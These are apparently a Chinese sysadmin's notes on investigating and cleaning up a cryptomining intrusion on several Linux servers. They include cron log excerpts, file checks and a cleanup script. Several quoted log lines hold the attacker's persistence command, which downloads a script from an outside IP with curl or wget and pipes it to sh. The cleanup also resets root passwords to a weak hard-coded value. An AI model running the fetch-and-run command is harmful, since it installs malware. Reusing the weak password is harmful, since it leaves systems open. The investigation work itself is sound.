记录一次真实的挖矿 入侵排查分析

https://cloud.tencent.com/developer/article/1461835
木马程序运行过程
https://www.cnblogs.com/diantong/p/11407526.html

/usr/bin/gbycfa4

-rwxr-xr-x 1 root root 4268416 9月  24 09:35 /usr/bin/gbycfa4
9月24号开启计划任务
Sep 24 09:30:01 harbor197 CROND[28911]: (root) CMD ((/usr/bin/gbycfa4||/usr/libexec/gbycfa4||/usr/local/bin/gbycfa4||/tmp/gbycfa4||curl -fsSL -m180 http://103.219.112.66:80
00/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh)

Sep 24 08:13:01 jumperserver130 crond[1249]: (crontabs) ORPHAN (no passwd entry)
Sep 24 08:15:01 jumperserver130 CROND[13230]: (root) CMD ((/usr/bin/gbycfa4||/usr/libexec/gbycfa4||/usr/local/bin/gbycfa4||/tmp/gbycfa4||curl -fsSL -m180 http://103.219.112
.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh)

cat /var/log/cron-20190929 | grep "/usr/bin/gbycfa4" | head -n4

java-linux136 | CHANGED | rc=0 >>
sep 24 08:00:01 deyi136 CROND[26478]: (root) CMD ((/usr/bin/gbycfa4||/usr/libexec/gbycfa4||/usr/local/bin/gbycfa4||/tmp/gbycfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh)

st-138 | CHANGED | rc=0 >>
Sep 24 08:00:01 st138 CROND[24252]: (root) CMD ((/usr/bin/gbycfa4||/usr/libexec/gbycfa4||/usr/local/bin/gbycfa4||/tmp/gbycfa4||curl -m180 -fsSL http://103.219.

crontab -l

crontab -e

 

cat /root/.ssh/authorized_keys
[root@harbor197 ~]# ll /root/.ssh/authorized_keys

-rw-r--r-- 1 root root 396 9月  24 09:30 /root/.ssh/authorized_keys

/usr/bin/gbycfa4
/usr/libexec/gbycfa4
/usr/local/bin/gbycfa4
/tmp/gbycfa4

192.168.1.161
192.168.1.190
192.168.1.191
192.168.1.192

crontab -e#编辑的文件位置
/var/spool/cron/

[root@harbor197 ~]# ll /var/spool/cron/root
-rw------- 1 root root 198 9月  24 17:30 /var/spool/cron/root
[root@harbor197 ~]# ll /var/spool/cron/crontabs/root
-rw-r--r-- 1 root root 199 9月  24 17:29 /var/spool/cron/crontabs/root

find  /var/spool/cron/ -mtime -23
可能注意的文件
/tmp/crontab.*

find /usr/ -mtime -30
find  /var/spool/cron/ -mtime -23 -mtime +21

注意的文件

ll /root/.ssh/authorized_keys
ll /usr/bin/gbycfa4
ll /var/spool/cron/root
ll /var/spool/cron/crontabs/root
ll /tmp/Jonason

/etc/rc.local
/etc/rc.d/rc.local
/etc/init.d/

yum -y install psmisc
pstree

systemd─┬─Jonason───5*[{Jonason}]

/usr/lib/systemd/system/ #这个目录存储每个服务的启动脚本，类似于之前的/etc/init.d/
/run/systemd/system/ #系统执行过程中所产生的服务脚本，比上面目录优先运行
/etc/systemd/system/

rm -rf /var/spool/cron/root
rm -rf /var/spool/cron/crontabs/root
echo "" > /root/.ssh/authorized_keys
pid=`ps -ef|grep gbycfa4|grep -v 'grep' | awk '{print $2}'` && kill -9 $pid
pid=`ps -ef|grep Jonason|grep -v 'grep' | awk '{print $2}'` && kill -9 $pid
rm -rf /tmp/Jonason
rm -rf /usr/bin/gbycfa4
echo "12345^&*" | passwd --stdin root
sed -i '4,33d' /etc/hosts

生产环境木马清理2
rm -rf /var/spool/cron/root
rm -rf /var/spool/cron/crontabs/root
sed -i '1d' /root/.ssh/authorized_keys
pid=`ps -ef|grep gbycfa4|grep -v 'grep' | awk '{print $2}'` && kill -9 $pid
pid=`ps -ef|grep Trump|grep -v 'grep' | awk '{print $2}'` && kill -9 $pid
rm -rf /tmp/Jonason
rm -rf /usr/bin/gbycfa4
rm -rf /tmp/Trump
echo "12345^&*" | passwd --stdin root
sudo sed -i '4,33d' /etc/hosts
cat /etc/hosts

 

测试端口查看

pid=`ps -ef|grep grep Jonason|grep -v 'grep' | awk '{print $2}'` && echo $pid

198
197
114
194
195
214
158未被入侵只是修改密码
170
112只修改密码 未被入侵
137
138
139
130
199

注意文件

/etc/passwd 用户信息文件
/etc/shadow 用户密码文件
/etc/hosts
/bin
/sbin root命令
/usr/bin 普通用户使用的应用程序
/usr/sbin 管理员使用的应用程序

 参考

myfile=a.txt
num=3 #要删除的行数 
max=`sed -n '$=' $myfile` #文件总行数
let sLine=max-num+1 #删除的起始行 
sed -i $sLine',$d' $myfile #从起始行删除到最后行